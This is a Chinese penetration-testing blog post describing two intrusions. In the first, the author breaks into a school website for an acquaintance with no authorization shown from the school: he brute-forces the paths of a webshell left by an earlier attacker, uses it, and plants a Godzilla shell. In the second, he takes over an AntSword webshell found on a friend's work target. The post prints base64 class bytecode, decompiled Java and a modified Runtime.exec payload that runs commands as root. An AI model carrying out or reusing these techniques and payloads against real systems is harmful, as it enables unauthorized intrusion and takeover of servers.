前言

五月初有人要我帮她看看她专升本的学校有没有漏洞，五月底又有人找我帮他看看他实习公司安排的站点有没有漏洞。因此记录一下这次获取权限的另类思路。

权限获取

帮妹妹获取学校权限

五月初的时候，某个晚上，有个女孩子私聊我了，问我怎么绕过修改密码的界面，此界面是由于使用初始密码登录后，强制要求修改符合密码复杂度的密码。

测试一下重置流程，会重新返回登录界面，而不是后台首页，因此无法去通过修改响应信息的关键字，以及直接访问后台首页的url进行绕过。

由于这个年龄，晚上睡不着很正常，所以就帮妹妹看了一下这个学校。

信息搜集

妹妹告知了我该学校的一部分信息（如工号和学校情况），然后我就想着能不能拿一个站点权限，毕竟不能拿shell的安服仔不是一个好的安服仔。

在信息搜集时发现一个可能可以被获取权限的站点。

疑是可被getshell的站点

但是通过测试发现、此处无上传漏洞。

但是在对js分析的时候，发现了一个图片管理的接口。

此处可以预览部分网站被上传的图片。

发现历史入侵痕迹

并且也发现了疑是webshell的文件。

入侵时间主要是去年年中和今年年初。

并在其中一个图片中找到了webshell的代码（由于写文章的时间，和之前测试时不一样，原先发现的webshell部分已经被删除）

那么这里就大胆猜测，应该有一个技术还不错的骇客成功拿到了该站的权限。

分析文件上传后的路径

通过此处分析可知，上传成功后，文件被保存在服务器的路径是/uploadfiles/文件后缀/年月/日/文件名

那么就有可能存在一个jsp或者jspx的马在服务器。

分析webshell后门路径

此时直接访问以下两个目标
http://x.x.x.x/uploadfiles/jsp
http://x.x.x.x/uploadfiles/jspx

发现存在jspx目录，此处就说明，该站点曾经被上传过一个jspx的webshell。

此时就直接用burp去爆破时间节点，然后再爆破shell路径。

时间爆破范围应该是在2020年至2022年。

通过爆破，找到了webshell的上传的年月时间

继续爆破找到了日

此时只差确定webshell的文件名了，这里随缘爆破1-9999。

emmm，其实前面不应该打码的。

结果是没想到爆出来了一个jspx

成功帮妹子getshell

直接github搜这个title

还是放和妹子的聊天截图吧

此时告诉妹子，通过查询edu上该校漏洞的历史提交记录发现，当前时间节点无任何getshell的高危漏洞，因此是后门，被恶意上传不告知的。

通过cmd马写一个哥斯拉，直连，发现存在许多shell。

最后也希望该妹妹能够成功专升本啦。

帮弟弟获取某站点权限

周一打完攻防，有个师傅私聊我了，要我帮他看看站，恰好回到酒店无聊就帮他看了一下。

这个目标是他的实习公司要他测的，并且有限制要求，不能传马，还给了一个账号名的提示，没给密码。

信息搜集

没给密码，看了一下登录框和登录流程，有验证码，所以懒得爆破了，试了一下常规的弱口令，没进去。

分析站点结构

在对站点js进行分析时发现了一个上传接口

试了一下，txt都无法传，无法正常用。

继续找接口

发现了附件管理接口，直接访问

发现历史webshell

访问接口后，直接搜jsp，看有没有啥奇怪的jsp文件被传在附件了，结果发现了疑是webshell的文件。

并且有6/2=3个

此时和弟弟沟通

此时就要想办法知道这三个shell的代码

此时发现还存在一个文件下载的接口

直接构造数据包，并通过附件管理接口的fileid去查询webshell的内容。

第一个jsp，好像没用

第二个马

没见过，百度搜了一下这个马，原来是蚁剑的马（有没有觉得这两个字特别难打）

尝试直连。

连接被重置，所以就想到直接发送命令执行的代码。

尝试命令执行

由于无法通过蚁剑直连目标的webshell，所以此处直接尝试连接一个可以正常连接蚁剑的马。

将此数据，先url解码，再base64解码，最后输出到字节码class文件中。

yv66vgAAADEBCQoAOQB4CQBbAHkJAFsAeggAewkAWwB8CAB9CQBbAH4IAH8JAFsAgAoAWwCBBwCCCgALAHgIAIMIAIQIAIUIAIYLADMAhwsAMgCICwAzAIgLADIAiQoAWwCKCQBbAIsKAFsAjAoACwCNBwCOBwCPCgAaAHgIAJAKABoAkQoAGQCSCgAaAJILADMAkwoACwCSCgBbAJQKAJUAlggAlwoAmACZCACaCACbCgBbAJwIAJ0IAJ4KAEkAnwoAoAChCgCgAJIKABoAogoAOQCjCgA3AKQHAKUHAKYHAKcIAKgKADcAqQgAqgcAqwoANwCsBwCtCgCuAK8IALAIAFwKADcAsQoAsgCzCgCyALQIAF4KAFsAtQcAtggAtwcAuAkAuQC6CgCuALMKADcAuwoAuQC8BwC9CgA3AL4KAL8AwAoAOQCSCgC5AMEKAEkAwgoASQDDCgBJAMQIAMUIAMYKAEkAxwgAyAgAyQoANwDKCAByCADLCADMCgA3AM0HAM4BAAdyZXF1ZXN0AQAnTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQAIcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAHZW5jb2RlcgEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAAmNzAQAMcmFuZG9tUHJlZml4AQAQZGVjb2RlckNsYXNzZGF0YQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAAtTeXNJbmZvQ29kZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAPV3d3Um9vdFBhdGhDb2RlAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAAhwYXJzZU9iagEAFShMamF2YS9sYW5nL09iamVjdDspVgEACGFzb3V0cHV0AQAGZGVjb2RlAQAKRXhjZXB0aW9ucwEAEkJhc2U2NERlY29kZVRvQnl0ZQEAFihMamF2YS9sYW5nL1N0cmluZzspW0IBAApTb3VyY2VGaWxlAQAJSW5mby5qYXZhDABlAGYMAFwAXQwAXgBfAQAGYmFzZTY0DABgAGEBAARVVEY4DABiAGEBAAEyDABjAGEMAG8AcAEAFmphdmEvbGFuZy9TdHJpbmdCdWZmZXIBAAw0YzZkODBkNmM2M2UBAAgxYzBmZmVkMQEADXZmYzU0MzBhNjRiYjYBAAl0ZXh0L2h0bWwMAM8A0AwA0QDQDADSAG4MAHIAbgwAZABhDABrAGwMANMA1AEAE2phdmEvbGFuZy9FeGNlcHRpb24BABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgEACUVSUk9SOi8vIAwA0wDVDADWAGwMANcA2AwAcQBuBwDZDADaANABAAh1c2VyLmRpcgcA2wwA3ABuAQAHb3MubmFtZQEACXVzZXIubmFtZQwAbQBuAQABCQEAAS8MAN0A3gcA3wwA4ADhDADTAOIMAOMA5AwA5QDmAQATW0xqYXZhL2xhbmcvT2JqZWN0OwEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAHWphdmF4LnNlcnZsZXQuanNwLlBhZ2VDb250ZXh0DADnAOgBAApnZXRSZXF1ZXN0AQAPamF2YS9sYW5nL0NsYXNzDADpAOoBABBqYXZhL2xhbmcvT2JqZWN0BwDrDADsAO0BAAtnZXRSZXNwb25zZQwA7gDvBwDwDADxAPIMAPMA9AwAdAB1AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQALZGVmaW5lQ2xhc3MBAAJbQgcA9QwA9gD3DAD4APkMAPoA+wEAEGphdmEvbGFuZy9TdHJpbmcMAPwA/QcA/gwA/wEADAEBAQIMAQMBBAwAaQBqDABlAQUBAAxqYXZhLnZlcnNpb24BAAMxLjkMAQYBAgEAEGphdmEudXRpbC5CYXNlNjQBAApnZXREZWNvZGVyDAEHAOoBABZzdW4ubWlzYy5CQVNFNjREZWNvZGVyAQAMZGVjb2RlQnVmZmVyDAD/AQgBAAliYXNlL0luZm8BAA5zZXRDb250ZW50VHlwZQEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAFHNldENoYXJhY3RlckVuY29kaW5nAQAMZ2V0UGFyYW1ldGVyAQAGYXBwZW5kAQAsKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1ZmZlcjsBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQATamF2YS9pby9QcmludFdyaXRlcgEABXByaW50AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQAKc3RhcnRzV2l0aAEAFShMamF2YS9sYW5nL1N0cmluZzspWgEADGphdmEvaW8vRmlsZQEACWxpc3RSb290cwEAESgpW0xqYXZhL2lvL0ZpbGU7AQA1KExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlO0lJKUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAdpc0FycmF5AQADKClaAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQARamF2YS9sYW5nL0ludGVnZXIBAARUWVBFAQARTGphdmEvbGFuZy9DbGFzczsBAA5nZXRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwEADmdldENv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

输出到字节码文件中

echo 数据 |base64 -d > 1.class

再用idea反编译1.class

代码如下：

package com.test;  
  
import java.io.*;  
import java.lang.reflect.Field;  
import java.lang.reflect.Method;  
import javax.servlet.http.HttpServletRequest;  
import javax.servlet.http.HttpServletResponse;  
  
public class Info {  
    public HttpServletRequest request = null;  
    public HttpServletResponse response = null;  
    public String encoder = "base64";  
    public String cs = "UTF8";  
    public String randomPrefix = "2";  
    public String decoderClassdata;  
  
    public Info() {  
    }  
  
    public boolean equals(Object var1) {  
        this.parseObj(var1);  
        StringBuffer var2 = new StringBuffer();  
        String var3 = "4c6d80d6c63e";  
        String var4 = "1c0ffed1";  
        String var5 = "vfc5430a64bb6";  
  
        try {  
            this.response.setContentType("text/html");  
            this.request.setCharacterEncoding(this.cs);  
            this.response.setCharacterEncoding(this.cs);  
            this.decoderClassdata = this.decode(this.request.getParameter(var5));  
            var2.append(this.SysInfoCode());  
        } catch (Exception var8) {  
            var2.append("ERROR:// " + var8.toString());  
        }  
  
        try {  
            this.response.getWriter().print(var3 + this.asoutput(var2.toString()) + var4);  
        } catch (Exception var7) {  
        }  
  
        return true;  
    }  
  
    String SysInfoCode() {  
        String var1 = System.getProperty("user.dir");  
        String var2 = System.getProperty("os.name");  
        String var3 = System.getProperty("user.name");  
        String var4 = this.WwwRootPathCode(var1);  
        return var1 + "\t" + var4 + "\t" + var2 + "\t" + var3;  
    }  
  
    String WwwRootPathCode(String var1) {  
        StringBuilder var2 = new StringBuilder();  
        if (!var1.startsWith("/")) {  
            try {  
                File[] var3 = File.listRoots();  
                File[] var4 = var3;  
                int var5 = var3.length;  
  
                for(int var6 = 0; var6 < var5; ++var6) {  
                    File var7 = var4[var6];  
                    var2.append(var7.toString(), 0, 2);  
                }  
            } catch (Exception var8) {  
                var2.append("/");  
            }  
        } else {  
            var2.append("/");  
        }  
  
        return var2.toString();  
    }  
  
    public void parseObj(Object var1) {  
        if (var1.getClass().isArray()) {  
            Object[] var2 = (Object[])((Object[])var1);  
            this.request = (HttpServletRequest)var2[0];  
            this.response = (HttpServletResponse)var2[1];  
        } else {  
            try {  
                Class var9 = Class.forName("javax.servlet.jsp.PageContext");  
                this.request = (HttpServletRequest)var9.getDeclaredMethod("getRequest").invoke(var1);  
                this.response = (HttpServletResponse)var9.getDeclaredMethod("getResponse").invoke(var1);  
            } catch (Exception var8) {  
                if (var1 instanceof HttpServletRequest) {  
                    this.request = (HttpServletRequest)var1;  
  
                    try {  
                        Field var3 = this.request.getClass().getDeclaredField("request");  
                        var3.setAccessible(true);  
                        HttpServletRequest var4 = (HttpServletRequest)var3.get(this.request);  
                        Field var5 = var4.getClass().getDeclaredField("response");  
                        var5.setAccessible(true);  
                        this.response = (HttpServletResponse)var5.get(var4);  
                    } catch (Exception var7) {  
                        try {  
                            this.response = (HttpServletResponse)this.request.getClass().getDeclaredMethod("getResponse").invoke(var1);  
                        } catch (Exception var6) {  
                        }  
                    }  
                }  
            }  
        }  
  
    }  
  
    public String asoutput(String var1) {  
        try {  
            byte[] var2 = this.Base64DecodeToByte(this.decoderClassdata);  
            Method var3 = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);  
            var3.setAccessible(true);  
            Class var4 = (Class)var3.invoke(this.getClass().getClassLoader(), var2, 0, var2.length);  
            return var4.getConstructor(String.class).newInstance(var1).toString();  
        } catch (Exception var5) {  
            return var1;  
        }  
    }  
  
    String decode(String var1) throws Exception {  
        boolean var2 = false;  
  
        try {  
            int var5 = Integer.parseInt(this.randomPrefix);  
            var1 = var1.substring(var5);  
        } catch (Exception var4) {  
            var2 = false;  
        }  
  
        return this.encoder.equals("base64") ? new String(this.Base64DecodeToByte(var1), this.cs) : var1;  
    }  
  
    public byte[] Base64DecodeToByte(String var1) {  
        Object var2 = null;  
        String var3 = System.getProperty("java.version");  
  
        try {  
            Class var4;  
            byte[] var7;  
            if (var3.compareTo("1.9") >= 0) {  
                var4 = Class.forName("java.util.Base64");  
                Object var5 = var4.getMethod("getDecoder").invoke((Object)null);  
                var7 = (byte[])((byte[])var5.getClass().getMethod("decode", String.class).invoke(var5, var1));  
            } else {  
                var4 = Class.forName("sun.misc.BASE64Decoder");  
                var7 = (byte[])((byte[])var4.getMethod("decodeBuffer", String.class).invoke(var4.newInstance(), var1));  
            }  
  
            return var7;  
        } catch (Exception var6) {  
            return new byte[0];  
        }  
    }  
}

分析代码有点麻烦，所以直接想办法找直接命令执行的回显点。

发现这样一段函数方法，此处是用来测试连接，回显当前用户目录，操作系统类型，以及当前服务器的用户。

那就简单了，直接将此处SysInfoCode的代码修改成命令执行语句。

Process p=Runtime.getRuntime().exec("whoami");  
InputStream ins= p.getInputStream();  
StringBuilder stringBuilder = new StringBuilder();  
String line=null;  
InputStreamReader inputStreamReader=new InputStreamReader(ins);  
BufferedReader bufferedReader=new BufferedReader(inputStreamReader);  
while((line=bufferedReader.readLine())!=null){  
    stringBuilder.append(line).append("\n");  
}

然后将其编译成字节码class文件。

再将Info.class文件进行base64编码。

在对数据进行url编码，然后发包

成功拿到网站的root权限。

执行id命令

passwd=yv66vgAAADQBUgoAPgCvCQBhALAJAGEAsQgAsgkAYQCzCAC0CQBhALUIALYJAGEAtwoAYQC4BwC5CgALAK8IALoIALsIALwIAL0LADgAvgsANwC%2FCwA4AL8LADcAwAoAYQDBCQBhAMIKAGEAwwoACwDEBwDFBwDGCgAaAK8IAMcKABoAyAoAGQDJCgAaAMkLADgAygoACwDJCgBhAMsKAMwAzQoAzgDPCADQCgDOANEKANIA0wcA1AoAKADVBwDWCgAqANcKACoA2AgA2QgA2ggA2woATgDcCgDdAN4KAN0AyQoAGgDfCgA%2BAOAKADwA4QcAoQcA4gcA4wgA5AoAPADlCADmBwDnCgA8AOgHAOkKAOoA6wgA7AgAYgoAPADtCgDuAO8KAO4A8AgAZAoAYQDxBwDyCADzBwCmCQD0APUKAOoA7woAPAD2CgD0APcHAPgKADwA%2BQoA%2BgD7CgA%2BAMkKAPQA%2FAoATgD9CgBOAP4KAE4A%2FwgBAAoBAQECCAEDCgBOAQQIAQUIAQYKADwBBwgAqAgBCAgBCQoAPAEKBwELAQAHcmVxdWVzdAEAJ0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEAB2VuY29kZXIBABJMamF2YS9sYW5nL1N0cmluZzsBAAJjcwEADHJhbmRvbVByZWZpeAEAEGRlY29kZXJDbGFzc2RhdGEBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAD0xjb20vdGVzdC9JbmZvOwEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWgEABHZhcjgBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAAR2YXIxAQASTGphdmEvbGFuZy9PYmplY3Q7AQAEdmFyMgEAGExqYXZhL2xhbmcvU3RyaW5nQnVmZmVyOwEABHZhcjMBAAR2YXI0AQAEdmFyNQEADVN0YWNrTWFwVGFibGUHAQsHAOkHALkHAPgHAMUBAAtTeXNJbmZvQ29kZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANpbnMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAA1zdHJpbmdCdWlsZGVyAQAZTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEABGxpbmUBABFpbnB1dFN0cmVhbVJlYWRlcgEAG0xqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyOwEADmJ1ZmZlcmVkUmVhZGVyAQAYTGphdmEvaW8vQnVmZmVyZWRSZWFkZXI7BwEMBwENBwDGBwDUBwDWAQAKRXhjZXB0aW9ucwcBDgEAD1d3d1Jvb3RQYXRoQ29kZQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAEdmFyNwEADkxqYXZhL2lvL0ZpbGU7AQAEdmFyNgEAAUkBAA9bTGphdmEvaW8vRmlsZTsHAJ0BAAhwYXJzZU9iagEAFShMamF2YS9sYW5nL09iamVjdDspVgEAE1tMamF2YS9sYW5nL09iamVjdDsBAAR2YXI5AQARTGphdmEvbGFuZy9DbGFzczsBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAIYXNvdXRwdXQBAAJbQgEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAGZGVjb2RlAQABWgEAEkJhc2U2NERlY29kZVRvQnl0ZQEAFihMamF2YS9sYW5nL1N0cmluZzspW0IHAOcBAApTb3VyY2VGaWxlAQAJSW5mby5qYXZhDABrAGwMAGIAYwwAZABlAQAGYmFzZTY0DABmAGcBAARVVEY4DABoAGcBAAEyDABpAGcMAJ8AoAEAFmphdmEvbGFuZy9TdHJpbmdCdWZmZXIBAAw0YzZkODBkNmM2M2UBAAgxYzBmZmVkMQEADXZmYzU0MzBhNjRiYjYBAAl0ZXh0L2h0bWwMAQ8BEAwBEQEQDAESAJgMAKgAmAwAagBnDACDAIQMARMBFAEAE2phdmEvbGFuZy9FeGNlcHRpb24BABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgEACUVSUk9SOi8vIAwBEwEVDAEWAIQMARcBGAwApQCYBwEZDAEaARAHARsMARwBHQEAAmlkDAEeAR8HAQwMASABIQEAGWphdmEvaW8vSW5wdXRTdHJlYW1SZWFkZXIMAGsBIgEAFmphdmEvaW8vQnVmZmVyZWRSZWFkZXIMAGsBIwwBJACEAQABCgEAAQkBAAEvDAElASYHAScMASgBKQwBEwEqDAErASwMAS0BLgEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAHWphdmF4LnNlcnZsZXQuanNwLlBhZ2VDb250ZXh0DAEvATABAApnZXRSZXF1ZXN0AQAPamF2YS9sYW5nL0NsYXNzDAExATIBABBqYXZhL2xhbmcvT2JqZWN0BwEzDAE0ATUBAAtnZXRSZXNwb25zZQwBNgE3BwE4DAE5AToMATsBPAwAqgCrAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQALZGVmaW5lQ2xhc3MHAT0MAT4AowwBPwFADAFBAUIBABBqYXZhL2xhbmcvU3RyaW5nDAFDAUQHAUUMAUYBRwwBSAFJDAFKAUsMAHIAcwwAawFMAQAMamF2YS52ZXJzaW9uBwFNDAFOAJgBAAMxLjkMAU8BSQEAEGphdmEudXRpbC5CYXNlNjQBAApnZXREZWNvZGVyDAFQATIBABZzdW4ubWlzYy5CQVNFNjREZWNvZGVyAQAMZGVjb2RlQnVmZmVyDAFGAVEBAA1jb20vdGVzdC9JbmZvAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9pby9JT0V4Y2VwdGlvbgEADnNldENvbnRlbnRUeXBlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAUc2V0Q2hhcmFjdGVyRW5jb2RpbmcBAAxnZXRQYXJhbWV0ZXIBAAZhcHBlbmQBACwoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVmZmVyOwEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACHRvU3RyaW5nAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsBABNqYXZhL2lvL1ByaW50V3JpdGVyAQAFcHJpbnQBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEAEyhMamF2YS9pby9SZWFkZXI7KVYBAAhyZWFkTGluZQEACnN0YXJ0c1dpdGgBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoBAAxqYXZhL2lvL0ZpbGUBAAlsaXN0Um9vdHMBABEoKVtMamF2YS9pby9GaWxlOwEANShMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTtJSSlMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAHaXNBcnJheQEAAygpWgEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAEWphdmEvbGFuZy9JbnRlZ2VyAQAEVFlQRQEADmdldENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7AQAOZ2V0Q29uc3RydWN0b3IBADMoW0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjsBAB1qYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcgEAC25ld0luc3RhbmNlAQAnKFtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAIcGFyc2VJbnQBABUoTGphdmEvbGFuZy9TdHJpbmc7KUkBAAlzdWJzdHJpbmcBABUoSSlMamF2YS9sYW5nL1N0cmluZzsBABcoW0JMamF2YS9sYW5nL1N0cmluZzspVgEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEACWNvbXBhcmVUbwEACWdldE1ldGhvZAEA